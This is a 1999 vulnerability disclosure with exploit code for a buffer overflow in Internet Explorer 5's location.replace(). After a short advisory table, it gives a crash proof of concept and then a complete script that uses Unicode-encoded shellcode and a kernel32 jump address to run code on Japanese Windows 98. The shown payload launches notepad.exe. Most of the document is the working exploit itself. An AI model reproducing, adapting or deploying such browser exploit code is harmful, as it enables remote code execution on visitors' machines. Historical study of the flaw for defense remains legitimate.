IE5 location.replace overflow exploit by L(phyx@i.am), Sep.21,1999. http://layer.webprovider.com/
15b0ebaed0ced7c91c142109eba13d162499fe92c2465e089456ee5db7f924d9
Posted to PENGUIN BBS 09/21 Tue 07:42:42
Name : L
Title : location.replace() overflow exploit
URL : http://layer.webprovider.com/
Contact : phyx@i.am
---
Internet Explorer has buffer overflow bug on "location.replace()".
If the long string is specified at argument of "location.replace()", buffer overflow will happen.
Platform Windows
Application Internet Explorer
Confirmed version 5.00.2314.1003
Fixed version None
Type buffer overflow
Exploitable Yes
Reappearance by remote Yes
Defense Disable active scripting
For example:
<script>
var longstring = new String();
for(i = 0; i < 8000; i++)
longstring += "a";
location.replace(longstring);
</script>
At GPF dialogbox, EIP will be 0x00610061 in this case.
JScript is using Unicode for internal character set.
Code of 'a' is 0x61 in ASCII.
But, in Unicode, code of 'a' is 0x0061.
We must use Unicode to exploit this bug.
For example:
<script>
var longstring = new String();
for(i = 0; i < 8000; i++)
longstring += "\u6161";
location.replace(longstring);
</script>
Now, we can set EIP freely.
Exploit sample that executes notepad.exe for Japanese Windows 98:
<script>
var JMPL = 0xe9;
var NOP = 0x90;
var EIP = 0xBFF72769; /* jmp %eax @ kernel32 */
var OVERFLOWLENGTH = 8000;
var EXPLOIT =
"\u9090\u9090\u9090\u9090\u9090" +
"\u48eb\u535b\u3053\u88c0\u0a43\u4388\u8811\u1643" +
"\u4388\ub922\u7750\ubff7\uff53\u89d1\u83c5\u0bc3" +
"\u28b9\uf76e\u53bf\uff55\u89d1\u83c7\u07c3\u28b9" +
"\uf76e\u53bf\uff55\u89d1\u83c6\u05c3\uff53\u83d7" +
"\u04c4\uc031\uff50\u83d6\u04c4\ub3e8\uffff\u6dff" +
"\u7673\u7263\u2e74\u6c64\u206c\u7973\u7473\u6d65" +
"\u6520\u6978\u2074\u6f6e\u6574\u6170\u2e64\u7865" +
"\u2065"; /* exploit code */
function WordToBinary()
{
var code = "";
for(i = 0; i < arguments.length; i++)
code += String.fromCharCode(arguments[i] & 0xffff);
return code;
}
function LongToBinary()
{
var code = "";
for(i = 0; i < arguments.length; i++)
code += String.fromCharCode( (arguments[i] ) & 0xffff,
(arguments[i] >> 16) & 0xffff );
return code;
}
function MakeExploitString(offset, eip, exploit)
{
var exstring = "";
var saddr = LongToBinary(eip);
var atebx = WordToBinary(0xf8eb) + "z"; /* jmp -6; (padding) */
var jmpto = (~(exploit.length*2) & 0xffffffff) + 1 - 5;
var jmpto_exploit =
WordToBinary((JMPL << 8) + NOP) + LongToBinary(jmpto);
var padstr = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
var padchar = padstr.charAt(0);
var lengthofpad;
var i, x;
lengthofpad = offset - atebx.length - jmpto_exploit.length - exploit.length;
x = Math.floor(lengthofpad / padstr.length);
for(i = 0; i < x; i++)
exstring += padstr;
lengthofpad -= (x * padstr.length);
for(i = 0; i < lengthofpad; i++)
exstring += padchar;
exstring += exploit;
exstring += jmpto_exploit;
exstring += atebx;
exstring += saddr;
lengthofpad = OVERFLOWLENGTH - exstring.length;
for(i = 0; i < lengthofpad; i++)
exstring += padchar;
return exstring;
}
function overflow()
{
estr = MakeExploitString(5166,EIP,EXPLOIT);
location.replace(estr);
}
</script>